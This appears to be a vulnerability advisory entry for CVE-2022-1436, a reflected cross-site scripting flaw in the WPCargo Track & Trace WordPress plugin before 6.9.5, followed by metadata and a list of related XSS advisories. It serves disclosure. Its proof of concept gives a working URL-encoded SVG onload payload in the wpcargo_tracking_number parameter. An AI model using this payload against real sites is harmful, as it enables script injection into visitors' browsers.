WPCargo Track & Trace < 6.9.5 – Reflected Cross Site Scripting | CVE 2022-1436 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the wpcargo_tracking_number parameter before outputting it back in the page, which could allow attackers to perform reflected Cross-Site Scripting attacks.

Proof of Concept

On a page using the [wpcargo_trackform] shortcode, append the following parameter and payload: wpcargo_tracking_number=%22%3E%3Csvg/onload=alert(/xss/)%3E

e.g: https://example.com/page-with-shortcode/?wpcargo_tracking_number=%22%3E%3Csvg/onload=alert(/xss/)%3E

Affects Plugins

Fixed in 6.9.5

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Raul

Submitter

Raul

Verified

Yes

WPVDB ID

d5c6f894-6ad1-46f4-bd77-17ad9234cfc3

Timeline

Publicly Published

2022-04-25 (about 3 years ago)

Added

2022-04-25 (about 3 years ago)

Last Updated

2023-02-05 (about 2 years ago)

Other

Published

Title

Published

2022-07-07

Title

Microsoft Advertising Universal Event Tracking < 1.0.4 - Admin+ Stored Cross-Site Scripting

Published

2017-03-01

Title

NewStatPress <= 1.2.4 - Stored Cross-Site Scripting (XSS)

Published

2025-06-05

Title

ShiftNav – Responsive Mobile Menu < 1.8.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-02-12

Title

WP Activity Log < 5.3.0 - Unauthenticated Stored XSS

Published

2025-04-11

Title

Additional Custom Product Tabs for WooCommerce < 1.7.1 - Authenticated (Contributor+) Stored Cross-Site Scripting